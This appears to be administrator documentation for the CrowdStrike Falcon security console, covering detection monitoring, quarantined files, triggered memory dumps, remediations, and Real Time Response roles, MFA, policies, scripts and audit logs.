The console displays up to 1,000 detections per day for a single Agent ID. If there are more than 1,000 detections for a host, it’s a clear indication that it should be investigated.
Detections are sent at a rate of every five seconds or more for each Pattern ID + AID pair.
When a CID + AID + Pattern ID group is on the same process ID, it is compressed to one pattern hit.
Falcon sends one email per day for each detection. For example, if a detection has 100 pattern hits on it in the same day, only one email will be sent out to each contact set up to receive detection alerts. If there are additional pattern hits the following day, contacts will receive another email.

Detection icons

Detection icons help you instantly get key information about a detection.

Severity colors

Colors help indicate the severity of a detection. For example, in the default color scheme, an orange icon represents a high-severity detection. Colors make it easy to identify and prioritize security events.

Default severity colors:

Severity	Default color	Example icon
Critical	Red
High	Orange
Medium	Yellow
Low	Green
Informational	Blue

Disposition and attribution icons

Disposition and attribution icons help you quickly triage detections without opening their summary panels.

Disposition icons help you learn whether an associated activity was blocked or killed. If you need more detailed info, you can open the detection’s summary panel and review the Actions taken info in the Process section.

Icons can also indicate whether a known adversary was involved or whether a detection was generated by the Falcon OverWatch team.

Disposition icon	Description	Example
Check mark	The process was blocked, and the detection was resolved.
Green dot	The detection was partially resolved. For example, the parent process or a subprocess was killed, an operation was blocked, or a file was quarantined.
Gray dot	The detection would have been resolved, but wasn’t. This disposition can help you identify opportunities to adjust your prevention policy settings.
Actor attribution	The detection is attributed to an adversary that’s monitored by CrowdStrike.
Falcon OverWatch	The detection was generated by the Falcon OverWatch team. For more info, see Falcon OverWatch.

Detections accessibility keyboard shortcuts

Key	Action
TAB	When in the main navigation or summary panel, moves through all nav items sequentially. In the Activity App, sequentially navigates to each row and each column by using every focusable element inside a row (buttons, links, and so on).
UP/DOWN arrow	Navigates the main navigation or open a drop down list. In the Activity App, skip to previous/next row (as long as a row has focus).
RIGHT/LEFT arrow	When in the main navigation, takes you into the sub-menu.
ENTER/SPACEBAR	Opens/closes a detection or aggregation row, selects a process row or metadata button inside a process row.

Mobile Detection Monitoring

Monitor mobile detections to understand the activity happening in your environment.

Requirements

Subscription: Falcon for Mobile
System requirements: None
Roles: Falcon Administrator, Mobile Admin

Working through mobile detections

View detections from Android and iOS hosts in Mobile detections (Endpoint security > Monitor > Mobile detections).

Mobile detections are also available in the unified detections view. For more info, see Detection Monitoring.

You can perform these actions on mobile detections:

View detection details, such as the user and mobile host involved.
Update the detection status.
Assign the detection to a user for further investigation or resolution.
Add tags or comments to the detection.

You can also create scheduled searches to send email notifications when specific detections are found. For more info, see Scheduled Searches.

Note: Mobile detections appear in the Falcon console for 90 days after they're generated. After 90 days, mobile detections aren’t guaranteed to be retained.

Viewing mobile detections

The Mobile Detections page displays the list of detections found on Android and iOS devices. You can search or filter the list and view details for individual detections.

Go to Mobile detections (Endpoint security > Monitor > Mobile detections).
Use the Search or filter menus to find specific types of detections. Type the search criteria or select the filter and then click Apply.
Show or hide table columns by clicking Configure table columns.
From Manage detections attribute templates or the open menu :

Customize detection attributes to adjust what information appears in the list of detections, helping you triage detections more quickly and easily. For more info, see Detection Attribute Management.
Click a detection to display the summary panel.
To view full details of a detection, select Actions > View details or click See full detection.

Modifying mobile detections

Update the status, assign a user, or add tags and comments to mobile detections.

Go to Mobile detections (Endpoint security > Monitor > Mobile detections).
Select one of these options:
- Modify a single detection: Locate the detection and from the action menu, select Edit detection.
  
  Tip: You can also modify a detection from the summary panel by using the Actions menu.
- Bulk modify detections: Select the detections and click Edit.
Modify the detection as needed.
- Use the Status and Assigned to menus to change the status or assign a user.
- Enter a new tag or remove existing tags using the Detection tags field.
- Enter a comment in the Add comment field.
Click Update detections.

Quarantined Files

View, manage, and release quarantined files.

Requirements

Subscription: Falcon Insight XDR, Falcon Prevent required for preventions
Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux
System requirements: None
Roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections and incidents. For full details about the roles required to perform specific actions on detections and incidents, see Roles for Falcon Insight Next-Gen SIEM.

About quarantined files

When a detection involves a quarantined file, it's shown in the detection summary panel in Endpoint detections.

Learn more about endpoint detections:

About Endpoint Monitoring
Endpoint Detection Monitoring

View quarantined files

In the Falcon console, go to Endpoint security > Monitor > Quarantined files.
Use the filter bar at the top to filter the list of quarantined files. For example:
- Status:Deleted
- Filename:CSQ.exe

Note: Unreleased quarantined files are automatically deleted from the host after 30 days. Unreleased quarantined files uploaded for Falcon Intelligence and other Falcon subscriptions are deleted from the CrowdStrike cloud after 90 days.

Release a file

When you release a file from quarantine, it's allowed to execute on that host. Releasing a file does not affect other hosts. To avoid triggering more preventions on other hosts, add the file to your global allowlist.

Note: Files that appear in Endpoint security > Monitor > Remediation are also available in Endpoint security > Monitor > Quarantined files and updates are reflected in both places.

In the Falcon console, open Endpoint security > Monitor > Quarantined files.
Select the files you want to release. To release files in bulk, filter files by quarantined status and click Select All.
Click Release.

Tip: Filter by quarantined status and use the Select All checkbox to release files in bulk.

Screenshot of quarantined files table with the release icon highlighted

Note: Quarantined files from removable media are released to C:\ProgramData\CrowdStrike.

If the host is offline, quarantined files are released when the host comes back online within 30 days. If the host remains offline for 30 days, the file stays quarantined.

Undo a released file

When you undo a release, the Falcon sensor treats the file as malicious again. The next time the file attempts to execute, the sensor blocks and quarantines it again. The sensor does not quarantine the file immediately.

In the Falcon console, go to Endpoint security > Monitor > Quarantined files.
Select the released files you want to quarantine again.
Click Undo Release.

Screenshot of quarantined files table with the undo release icon highlighted

Download a file

You can download a file from the Falcon console for further investigation. This requires you to enable Upload quarantined files at Support and resources > Resources and tools > General settings on the Quarantined files tab. By default, file extraction is disabled.

Note: By default, file extraction is disabled.

In the Falcon console, go to Endpoint security > Monitor > Quarantined files.
Near the file you want to download, click Download.
Provide the password infected when you unzip the downloaded file.

Note: Files that appear in Remediation are also available in Quarantined files, and updates are reflected in both places.

Screenshot of the quarantined files table with the download file icon highlighted

Delete a file

In the Falcon console, go to Endpoint security > Monitor > Quarantined files.
Select the files you want to delete.
Click Delete.

Tip: Filter by quarantined status and use the Select All checkbox to delete files in bulk.

Screenshot of the quarantined file table with the delete icon highlighted

File extraction FAQs

Encryption: Extracted files are encrypted in transit and at rest
File size: Files up to 32 MB can be downloaded
Permissions: Users with the roles Falcon Admin and Falcon Security Lead can download extracted files
Operating systems: Windows, macOS, and Linux

Triggered Memory Dumps

Learn how to enable triggered memory dumps. Discover how this data is collected and stored.

Overview

A memory dump is a snapshot of memory taken at a specific time. The granularity of a memory dump depends on the type of memory dump. Triggered memory dumps currently support the taking of a process memory dump, which is a record of the memory of a single application. Memory dumps are obtained and uploaded to the cloud when the Falcon sensor or a CrowdStrike security analyst has identified suspicious activities on the endpoint.

Requirements

Subscription: Falcon Insight XDR

Sensor support: All supported versions of Falcon sensor for Windows

CrowdStrike clouds: Available in US-1, US-2, and EU-1

System requirements: None

Roles:

Falcon Administrator can enable triggered memory dumps.

About triggered memory dumps

CrowdStrike can open memory dumps in a debugger, which means they can perform the following actions.

Confirm adversarial activity.
Improve CrowdStrike detection technology.
Extract malicious commands, in-memory plugins, scripts, and modules.

These insights support the continued enhancement of CrowdStrike's protection capabilities and threat intelligence.

Memory dumps are collected and securely uploaded to the cloud when suspicious activity is identified by the Falcon sensor or a CrowdStrike security analyst, based on their professional judgment. The memory dumps are then processed offline by CrowdStrike to confirm threats, enhance detection, and extract malicious data.

Because memory dumps may contain personally Identifiable Information (PII) or other sensitive information, memory dumps are protected by several methods.

Encryption: Memory dumps are encrypted both in transit and while stored. They never reside unencrypted on disk on the originating endpoint or in cloud storage.
Role-based access controls: Memory dumps are stored in an S3 bucket with role-based access controls granted according to the principle of least privilege.
Retention: Memory dumps are retained in the cloud per the terms of contractual retention agreements.
Auditing: Users can identify the memory dumps that have been collected using Event Investigation.

Triggered memory dumps are different from Real Time Response (RTR) memory dumps. An RTR memory dump can only be done by a customer with the correct security role or Falcon Complete. This process takes longer than a triggered memory dump, and might mean that information about the adversary is overwritten before the memory dump is approved. For more info, see Real Time Response.

Configure memory dumps

Triggered memory dumps can be enabled by Falcon Administrators. In the Falcon console, go to Support and resources > Resources and tools > General settings . Click Triggered memory dumps, and enable the toggle.

Remediations

View the remediation actions that the Falcon platform has taken on detections.

Requirements

Subscription: Falcon Insight XDR, Falcon Prevent required for preventions
Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux
System requirements: None
Roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections and incidents. For full details about the roles required to perform specific actions on detections and incidents, see Roles for Falcon Insight Next-Gen SIEM.

About remediations

In Remediation, view the remediation actions Falcon has taken on detections. Refine the list of detections using filters, which allow you to focus on attributes including Remediation type, Time, Severity, Tactic, and Technique.

The Advanced Remediation prevention policy setting must be enabled for Falcon to perform remediation actions.

Read more about the setting and the actions that Falcon can perform in Prevention Policy Settings.

Getting to Remediations

Go to Remediation (Endpoint security > Monitor > Remediation) to see all of the detections that have had automated remediation activity performed in the last 90 days.

Review the remediation actions performed on a detection

On the Remediation page (Endpoint security > Monitor > Remediation) page, click any detection to go to the full details of the remediation action performed.

screenshot of the remediation actions page for a detection

The remediation page for a detection shows complete information about the remediation actions performed on a detection.

Go to full detection button: Open the detection that triggered the automated remediation in a new tab.
Hosts tab: Basic information about the hosts where the remediation was performed, and a link to go to its full details in Host Management.
Vulnerabilities tab: A quick overview of vulnerability information about the hosts involved in the detection, and a link to go to more details in on the Vulnerabilities page (requires a subscription with vulnerability management).
Detection information: Essential details about the detection, including whether the process was killed or blocked, Description, and Command line, if applicable.
Remediation timeline: A complete list of all remediation actions.
- Click the copy icon to copy the details of a remediation.
- These actions might appear:
  - File quarantined
  - Process killed
  - Registry value deleted
Audit log: Shows the actions taken by your organization’s Falcon users

Response

Real Time Response

Connect to and run commands on hosts from the Falcon console.

About Real Time Response

Use real time response to run commands on a Windows, macOS, or Linux host directly from the Falcon console. Real time response gives you more sophisticated incident response options beyond network containing a host, and you can connect to an online host immediately from any location. For more info, see Network Containment.

Note: Real time response is not available for ChromeOS hosts.

You can use real time response to perform many common response and remediation tasks.

List running processes and kill processes
Show network connections
Navigate the file system, get or delete files, and perform many file system operations

Note: The get command can only download files that are present on the host. Cloud storage and sync options that make files available only through cloud connections, such as OneDrive, are not supported.
Upload files
Remotely restart or shut down a host
Manage and run your own custom scripts or executables

Additional capabilities for Windows hosts:

Retrieve memory dumps
Query, create, or modify registry keys
Collect diagnostic logs and stateful information about a host

Requirements

Subscription:
- Falcon Insight XDR
- Falcon Identity Threat Protection with Falcon Prevent
- Falcon Control and Respond with Falcon Prevent
Sensor:
- All supported versions of Falcon sensor for Windows, macOS, and Linux.
  Note: Falcon Container does not support Real Time Response for pods.
CrowdStrike clouds: For US-GOV-1 and US-GOV-2, Real Time Response and the RTR GET command are disabled by default. Contact Support to enable these functions.
Windows hosts system requirements:
- PowerShell: 3.0 or later is recommended; at least 2.0 is required. PowerShell constrained language mode must not be enabled.
  Note: Windows 10 ARM64 provides only an x86 version of Powershell.exe. As a result, RTR scripts are run using WOW64 emulation, which redirects certain registry and filesystem accesses to alternate locations specifically for x86 processes. For example, an attempt to access %WINDIR%\System32 is redirected to %WINDIR%\SysWOW64. To access the native System32 directory, use %WINDIR%\Sysnative instead. If you upgrade to Windows 11, you get a 64-bit version of Powershell.exe that is not subject to these redirects. After an upgrade to Windows 11, the Falcon sensor uses the 64-bit version on the next sensor update or reinstall.
- .NET Framework: 4.5 or later is recommended and even required to use the zip and encrypt commands. At least 3.5 is required in all cases.
macOS hosts system requirements:
- zsh: Real Time Response is hardcoded to use the system zsh located at /bin/zsh.
Linux hosts system requirements:
- Bash: 3.0 or later is required.
Policy requirements: To perform Real Time Response, the target host must be in a group associated to a response policy that has Real Time Response enabled.
Network access: a host must be online for you to connect to it. You can connect to a host when it's been network contained.
Roles:
- You must have a Real Time Responder role or custom role with the required Real Time Response permissions to connect to a host. For more info, see Individual command permissions for custom roles.
- The Falcon Administrator role doesn't include access to Real Time Response.
- You must assign a Real Time Responder role or equivalent custom role permissions to each user that needs access to perform Real Time Response actions.
  Important: You should only assign RTR Active Responder and RTR Administrator roles to experienced incident response staff. Users with these roles can execute potentially destructive commands on your hosts.

Getting started with Real Time Response

If you have never used Real Time Response in your environment before, familiarize yourself with the following concepts and setup tasks:

Determine what response actions you want users to be able to perform on your hosts by learning about the available Real Time Response commands. For more info, see Real Time Response commands.
Understand and assign Real Time Responder roles. Assign custom roles and granular permissions that define the response actions your users can perform. For more info, see Real Time Responder roles.
Configure Response Policies by creating policies and assigning host groups to them. For more info, see Configuring response policies.
Create custom scripts, if using the runscript command. For more info, see Managing custom response scripts.
Upload files, if using the put command. For more info, see Managing files for the put command.

Real Time Responder roles

Falcon has 3 default Real Time Responder roles to grant users access to different sets of commands to run on hosts.

Real Time Responder - Read Only Analyst (RTR Read Only Analyst) - Can run a core set of read-only response commands to perform reconnaissance
Real Time Responder - Active Responder (RTR Active Responder) - Can run all of the commands RTR Read Only Analyst can and more, including the ability to extract files using the get command, run commands that modify the state of the remote host, and run certain custom scripts
Real Time Responder - Administrator (RTR Administrator) - Can do everything RTR Active Responder can do, plus create custom scripts, upload files to hosts using the put command, and directly run executables using the run command

For full details about the commands each default RTR role can run, see Real Time Response commands and default user role permissions.

Users can also run RTR commands if they have a custom role with the necessary granular permissions. For more info, see Individual command permissions for custom roles.

Individual command permissions for custom roles

Note: The RTR console supports RTR granular permissions. However, API clients that connect to the Falcon console use a separate scope-based permissions model that does not support RTR granular permissions.

You can use custom roles to provide users with granular permissions to individual RTR commands. This allows users to execute only the commands that are required for their specific roles.

Note: Only Falcon Administrators can create custom roles.

For info about how to create a custom role, see Creating custom roles.

Running RTR commands

Important: If the necessary permissions aren’t enabled for users running RTR commands, connection attempts to a host will fail.

To run RTR commands, you must have either a default RTR role or a custom role that enables the 4 permissions mentioned in these steps:

On the Roles and permissions page, under each respective permissions group, click Edit permissions.
Enable each of these permissions:
- Host Management > Read device details
- Response Policies and Settings > View Response policies
- Real Time Response > Write RTR commands
- Real Time Response > Read RTR command responses
Note: The Read device details permission grants access to the Host management page in the Falcon console. The other permissions are required for the Connect to host action to be available for hosts listed on the Host management page.
Click Save.

To run RTR commands as a user with a custom role, you also need to enable permissions for RTR commands.

On the Roles and permissions page, under the Real Time Response group, click Edit permissions.
Enable either of these types of permissions:
- Any of the Execute permissions for individual RTR commands, or
- Any of the Activate permissions for groups of RTR commands
Click Save.

For more info about enabling permissions, see Edit custom role permissions.

Real Time Response identity verification

Real Time Response (RTR) identity verification allows you to enforce multi-factor authentication (MFA) on certain RTR risk-based operations. With Falcon MFA for RTR enabled, users are prompted for additional authentication when attempting to execute a designated task during an RTR session. This additional layer of security helps improve your zero-trust security posture and safeguard against potentially damaging effects of malicious or incorrect use.

About Falcon MFA for RTR

Falcon MFA for RTR uses time-based one-time password (TOTP) authentication to validate the identity of users. With TOTP, users are required to enter a 6-digit code that’s generated by an authentication app on their mobile device before they’re allowed to perform an MFA-enforced operation.

Note: A TOTP code used during Falcon login also authenticates the user for MFA for RTR identity verification. This authentication remains valid until the grace period defined in the MFA for RTR section of your account's General Settings ends. After logging in to Falcon with MFA, users who attempt to perform an MFA-enforced RTR action within the grace period will not be prompted to re-authenticate.

Account configuration

Falcon MFA for RTR is enabled and configured for all users in your organization from the General settings page. When defining MFA for your CID (customer ID), you choose when and how often users are prompted to verify their identity.

Gated UI action: You can apply Falcon MFA to one of these RTR triggers:
- Before initiating any RTR session or action
- Before running a 'run' or 'kill' command or quick action
- Before enabling a Fusion SOAR workflow with any RTR action
Grace period: Configuration also includes setting a grace period for MFA prompts. During this period of time, a user can perform the MFA-enforced action without being prompted again for authentication. When the grace period expires, the user is prompted to reauthenticate with a TOTP code.

User configuration

If your CID uses single sign on (SSO) for Falcon login, individual users must also install a TOTP authentication app on their mobile device and set up an MFA profile specifically for RTR access using a QR code that Falcon provides. Users that log in with Falcon MFA have already completed this process. Falcon MFA for RTR is supported on most authentication apps that comply with the TOTP standard, such as Google Authenticator and Microsoft Authenticator.

Requirements

Roles: Falcon Administrators can enable and configure Falcon MFA for RTR.
Falcon login: Accounts must use Falcon MFA or a third-party SSO for Falcon console login.
TOTP mobile application: Falcon MFA for RTR requires use of a TOTP authentication application, such as Google Authenticator or Microsoft Authenticator.
Falcon Flight Control:
- Falcon MFA for RTR is enabled and managed independently by each CID in a Falcon Flight Control environment.
- Users with multi-CID access: Falcon MFA for RTR enforcement in CIDs other than a user’s home CID requires both the home CID and the additional CID to use Falcon MFA or a third-party SSO for Falcon console login.

Limitations

Falcon MFA for RTR is not supported through the CrowdStrike API.

Enable and configure Falcon MFA for RTR

Real Time Response identity verification isn’t enabled by default. Falcon Administrators can turn on MFA enforcement for all users by going to Support and resources > Resources and tools > General settings and configuring up-front settings that specify the MFA trigger and how often users are prompted.

After setting up MFA for the organization, users are prompted to authenticate the next time they attempt to execute the MFA-enforced operation. If a user is not set up with Falcon MFA for RTR, the MFA prompt will invite them to enroll.

Note: Enabling Real Time Response identity verification applies Falcon MFA to all users in the CID, regardless of response policies and associated host groups. To enable and configure Falcon MFA for RTR, you must already have Falcon MFA set up in your user profile.

Step 1: Enable Real Time Response identity verification

Go to General settings (Support and resources > Resources and tools > General settings).
Click Security.
In Real Time Response identity verification, click to turn on Falcon MFA.

Note: This task requires user enrollment in Falcon MFA. If you are not currently enrolled in Falcon MFA, you will be prompted to log out and set up Falcon MFA before proceeding.
In the MFA verification window, enter the 6-digit code generated by your mobile authentication app.

Step 2: Configure Falcon MFA for RTR settings

Specify Gated UI action for MFA. Choose Before initiating any RTR session or action, Before running a 'run' or 'kill' command or quick action (default), or Before enabling a Fusion SOAR workflow with any RTR action.
Set a Grace period that determines how often users must reauthenticate. (Current default: 24 hours) After a user authenticates with TOTP, they are not prompted for MFA again for the amount of time set in the grace period.
Click Save.
In the MFA verification window, enter the 6-digit code generated by your mobile authentication app.

User setup

As part of the setup process, each user must individually enroll in Falcon MFA by downloading a TOTP authentication application on their mobile device and syncing it to Falcon. This process is already completed for users who log in to Falcon with Falcon MFA. Unenrolled users are automatically prompted to set up Falcon MFA when they attempt to execute the MFA-enforced operation.

Step 1. Download a TOTP authentication app

Download Google Authenticator, Microsoft Authenticator, or another TOTP-compatible application of your choice on your mobile device. You’ll need access to this device to verify your identity when performing the MFA-enforced RTR operation in Falcon.

Step 2. Set up Falcon MFA on your authentication app

Open the Falcon MFA for RTR setup workflow. This window opens when you attempt the MFA-enforced RTR operation. You can also initiate the process from your user profile settings (User profile > your username/email address).
Note: For added security, you're required to log out and back in to set up MFA for RTR.
Using your authenticator app, scan the QR code or enter the manual activation key displayed in Falcon.
Enter the 6-digit verification code from your authentication app and click Set up Falcon MFA for RTR.
Note: For security, your 6-digit enrollment code must be entered within 5 minutes after scanning the QR code. Codes entered after 5 minutes may result in error and require logging out and back in to Falcon to resume enrollment.

Configuring response policies

Create and edit response policies with the necessary response capabilities to meet the needs of your host groups In Host setup and management > Response and containment > Response policies . This is where you can customize which Real Time Response commands can be executed on your environment’s hosts.

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.

A list of three Windows response policies

The default policy provides baseline Real Time Response capabilities and is enabled by default for all hosts. Create additional response policies for your host groups as needed to make sure the response actions that can take place are aligned with your environment’s compliance requirements and needs. If you need to prevent all connection to and response actions on a group of hosts, create and assign them to a response policy with nothing enabled.

Users with the Falcon Administrator role can create and configure Response Policies.
Response policies operate with the same policy precedence rules as Prevention policies. For more information, see Policy precedence.

Note: Response policy setting changes might take some time to take effect on all hosts.

Connecting to a host

You can connect to a host to perform Real Time Response from a number of places in the Falcon console. Multiple Falcon users can connect to the same host simultaneously.

Endpoint security > Monitor > CrowdScore incidents:

Go to an incident’s views.
On the right of the host details, click the three-dot menu and click Connect to host.

Endpoint security > Monitor > Endpoint detections:

Select a detection.
In its details, click Connect to Host.

Host setup and management > Manage endpoints > Host management:

Select a host.
In its details, click Connect to Host.

Exposure management > Assets > Asset graph:

In the asset graph, click the asset to open the details panel.
Open the Actions menu.
Click Connect to host.

You can connect to hosts from the Investigate app.

Note: These access points always show the Connect to Host links, but only users with Real Time Responder roles can actually launch Real Time Response sessions.

Investigate > Search > Hosts:

Perform a search.

Tip: If you see a lock icon in Apply, add a valid computer name to the *Host* field.
In the Real Time Response column, click Connect to Host.

Investigate > Search > Advanced event search

Perform a search and view an event.
In the event’s details, select Connect to Host from the Event Actions menu.

Default response policy

The Default response policy is applied to hosts that are not specifically assigned to another response policy. It provides a solid baseline with guardrails around some of the higher risk commands. The default response policy has all settings enabled except Custom Scripts and run.

Real Time Response policy settings

Real Time Response

This is the basic policy setting required to perform any Real Time Response actions on hosts.

Custom Scripts

This setting controls whether users with RTR Active Responder or RTR Administrator can run custom scripts. Click Enable All in the title bar or enable the toggle in the expanded view.

Falcon Scripts

When enabled, RTR Administrators can view and execute Falcon scripts. The Custom Scripts setting must be enabled to turn on Falcon scripts.

High risk commands

The settings in this section control availability of a collection of commands that have a higher potential to cause problems if improperly executed:

get
put
run
memdump (Windows only)
xmemdump (Windows only)
put-and-run (Windows and Mac only)

Note: cswindiag (Windows only) is also considered a high risk command because it relies on put-and-run.

Click Enable All in the title bar or enable toggles individually in the expanded view.

Creating a response policy

Go to Host setup and management > Response and containment > Response policies .
Click Add New Policy.
In the New Policy Details dialog, enter a policy name and description.
Click Create to create the policy.
Enable or disable individual response policy settings on the Policy details page.
Click Save to save your settings.
Note: Enable the new policy to apply it to hosts. All new policies are disabled overall by default to allow you to configure it completely.

Assigning a response policy to host groups

On the Response Policies page:

Find the policy you want to assign to a host group and click the edit icon on the far right to go to its details page.
Go to the Assigned Host Groups tab.
Click Add groups to policy in the upper-right.
In the Add Groups to Policy dialog, select one or more groups.
Click Add groups to policy. After you assign a group to a policy, that group will no longer be shown when you select additional groups.

Enabling or disabling an entire response policy

Each response policy can be enabled or disabled altogether. This allows you to configure a policy completely before turning it on to impact hosts and quickly turn it off if needed. When a policy is first created, it must be enabled before it is applied to hosts. To turn a policy on or off, click Enable or Disable in the top right of any Policy details page.

Deleting a response policy

You can permanently remove a policy by deleting it. You must disable the policy before you can delete it. When you delete a policy, the hosts from that group is reassigned to another policy based on your policy precedence.

To delete a policy, click Delete on any Policy details page.

Using Real Time Response

Using the RTR console

From the RTR console, you can execute commands, run scripts, and view information about the host you’re connected to.

The Hostname, Platform, and the host’s Connection status with session start timestamp display at the top of the window.
Available commands you can run are listed in the middle of the console.
Expand the details panel from the right to see:
- Host info tab:
  - View attributes and metadata for the connected host.
  - Click the Response policy name to open the host’s associated response policy settings.
  - Click the Host ID to view the host details on the Host management page.
- Scripts tab:
  - View Falcon scripts and your CID’s custom scripts that you can run on the host.
  - Search for a script by name or sort the list of scripts by most recently used date or alphabetically by name.
  - Click a script name to populate the command field.
  - View details, insert, edit, or delete from the three-dot menu on the right of a specific script.
- Files tab:
  - View your CID’s existing list of uploaded “put” files (Host setup and management > Response and containment > Response scripts and files) that you can put onto the host.
  - Click a file name to populate the command field.
  - View the file details or insert the file in the command field from the three-dot menu on the right of a specific file.
- Detections tab:
  - See a list of the connected host’s detections.
  - Sort the list by date (Newest/Oldest) or severity (Critical/Informational).
  - Expand a specific detection to see additional info and link to more details in Endpoint detections.
Run commands and custom scripts on the host from the tabs at the bottom of the console.

Running commands

On the host you are connected to, you can run commands from the list in the Run Commands tab of the Real Time Response window. Run the help command for a list of all available commands.

Read about the available commands in Real Time Response commands and role permissions and Additional Info: Real Time Response Commands.

Tips for running commands

Expand the session details panel from the right to see Custom scripts and “put” files. You can click the names in either of these sections to populate the command field.
Type in a command to see available arguments.
If a command is taking too long and you need to move on to other commands, click Cancel. You won’t see the output of commands you cancel, but they do continue to run in the background.
Command flags are not case-sensitive on Windows. They are case-sensitive on macOS and Linux.
When running a command that includes a file path with a space, wrap the path in quotation marks, such as "C:\Program Files\myprogram.exe".
Be aware when working with files that are on a network share. If the host loses access to the network share, unexpected behavior might result.

Running scripts

You can run Falcon scripts and custom scripts from either tab in a Real Time Response session.

Running scripts from the Run Commands tab

On the Run Commands tab, you have two options to populate the command field to run a Falcon script or a custom script:

Expand the session details panel from the right to see available Falcon scripts and custom scripts under the Scripts tab. Click the name of any script to populate the command field or click Open menu and select Insert script. You can search and sort the scripts lists and select View details to see the script content and provide Falcon script arguments.
For custom scripts, run the runscript command with one of the following flags:
- CloudFile: Enter the name of an existing custom script already saved in the CrowdStrike cloud directly into the command line
- Raw: Enter the script content directly into the command line. (RTR Administrator only). Enclose the entire script contents in triple backticks.
- HostPath: Enter the file path of an existing custom script stored locally on the remote host (RTR Administrator only)

For Falcon scripts, Run the falconscript command with the following flags:
- Name: Enter the name of the Falcon script. For example, “FileInfo”.
- JsonInput: Enter the JSON input for the Falcon script. Enclose it in single quotes and triple backticks. For example: ```‘{“Path”:“C:\\\myfile.txt”}’```

Tips for running custom scripts

PowerShell code cannot be used in -CommandLine arguments.
Re-quote special characters in -CommandLine arguments.

This table provides examples of valid and invalid -CommandLine arguments.

Table 1. Command line argument examples
Command type	Example script
Valid argument	runscript -CloudFile=test_script -CommandLine=```-TestArg 'semi_colon;_in_arg'```
Valid argument	runscript -CloudFile=test_script -CommandLine=```-TestArg "(arg_val_in_curly_bracket)"```
Invalid argument	runscript -CloudFile=test_script -CommandLine=```-TestArg pipe\|in_arg```

Running scripts from the Edit & Run Scripts tab

On the Edit & Run Scripts tab (RTR Administrator only):

Directly enter or paste your script into the script field.
Expand the session info panel from the right to see available Falcon scripts and custom scripts under the Scripts tab. Click the name of any script to populate the script field, then click Run.

Users with the RTR Administrator role can also create custom scripts, edit existing scripts from the Edit & Run Scripts tab, and save them to the cloud. Read more in Managing custom response scripts.

Reviewing the script output

Script execution results display in the RTR terminal in text or JSON format.

Custom scripts: Can output to plain text or JSON, depending on the script’s output schema configuration.
Falcon scripts: Output to JSON only.

Click output settings to access these optional actions:

Copy to clipboard: Copy the full text or JSON output exactly as it’s displayed.
Download: Download a text or JSON file of the output in the format that it’s displayed.
View in new window: Open the output in a separate window for easier viewing.

Ending a connection

End your connection to a host by clicking the End session button on the upper right corner of the window, or by closing the browser tab. Real Time Response sessions automatically end after 10 minutes of inactivity.

If you close a Real Time Response session's browser tab, you can reconnect to that session within 5 minutes. When you reconnect, you will have access to your previous command history. If you don't reconnect, the session automatically ends after 5 minutes.

Reviewing Real Time Response audit logs

Real Time Response-related activities are tracked and can be viewed in two audit logs in Falcon.

RTR sessions: Review the commands performed in each Real Time Response session’s details (includes files retrieved using the get command)
Response scripts and files: See the event history of maintenance performed on:
- custom scripts
- files for the put command

Roles info: Real Time Response audit logs

	RTR Read Only Analyst	RTR Active Responder	RTR Administrator	Falcon Administrator
Real Time Response Session Details	Can view their own session details	Can view their own session details	Can view their own session details	Can view all session details
Custom scripts audit log	Cannot access	Cannot access	Can see all events	Can see all events
"Put" files audit log	Cannot access	Cannot access	Can see all events	Can see all events

Viewing audit logs about Real Time Response sessions

The RTR sessions page (Audit logs > Audit logs > RTR) provides a history of recorded activity for your CID’s Real Time Response sessions.

Session start time: The date and time the session began.
Session status: The current session status (Active or Inactive).
User: The user who connected to the host.
Hostname: The host that was accessed.
Connected from: The source where the session was initiated from.
Commands used: The commands that were run.
Note: Certain command fields may be redacted for security purposes.
Session duration: The time between the session start and last command run on the host.Note:
- Commands such as help, clear, and history are not recorded in the audit log.
- A Duration of 0 secs displays when no commands are run during the session.
- A session will show a Duration without any Commands used when a user initiates a session with a host, closes the session browser tab, and then initiates another session with the same host. In this case, the Duration is calculated as the time between the first and second initiations.
Retrieved files: The number of files that were uploaded from the host to the CrowdStrike cloud using the get command (files are available for 7 days)
Three-dot menu: Access options to open the session details panel or generate a CSV or JSON export of the session data.

The default view orders sessions by start time, with the most recent session displaying first. Reorder the list by clicking any column header with an arrow beside its name. Use the filter menus to display only the sessions you’re interested in.

View a session’s details

Click a session in the list to open the details panel. View high-level information about the RTR session, including details about the host, retrieved files, and detections. In addition, users with the RTR Administrator or the RTR Active Responder role can see the upload status of get command files. They can also download and delete files that were retrieved within the last 7 days. Users with the Falcon Administrator role can view in-progress and completed file uploads but cannot download or delete retrieved files.

Session details tab:
- See the session status, the user who connected to the host, the host that was accessed, the session start and end times, and the session duration.
  - The Duration calculates the time between the session start and last command run on the host.
  - Commands such as help, clear, and history are not recorded.
  - A Duration of 0 secs displays when no commands are run during the session.
  - A Duration displays in sessions where no commands are issued when a user initiates a session, closes the session browser tab, and initiates another session with the same host. In this case, the Duration calculates the time between the first and second initiations.
- Sessions where commands are used include a timeline of session activity.
Host info tab:
- View attributes and metadata for the connected host.
Files tab:
- See any files that were retrieved from the host using the get command.
Detections tab:
- See a list of the connected host’s detections.
- Sort the list by date (Newest/Oldest) or severity (Critical/Informational).
- - Expand a specific detection to see additional info and link to more details in Endpoint detections.

Viewing the "put" files and custom scripts audit log

On the Response scripts and files page (Host setup and management > Response and containment > Response scripts and files), click the Audit log tab to see a record of each time an event has taken place involving files for the put command and custom scripts. See the date, the user involved, the event that took place, the type (“put” file or Custom script), the name of the file or script, and any comments they might have recorded.

Click any row to expand the log info panel to see more details about the event, including the description, hash, “put” file size, and custom script content.

Export the audit log or customize the columns that are displayed by clicking the icons in the upper right: - Export - Configure table columns

Viewing Falcon scripts

Falcon scripts are predefined scripts that you can execute out of the box on Windows hosts. If you’ve enabled Falcon scripts in the Response policy settings, you can view the Falcon scripts library on the Response scripts and files (Host setup and management > Response and containment > Response scripts and files). See a summary of key info about what each script does and how it’s used, and select any script in the list to open the details panel for additional info, including the script code. You cannot directly edit Falcon scripts, but you can copy the script code and save it as a custom script to modify it for your own purposes.

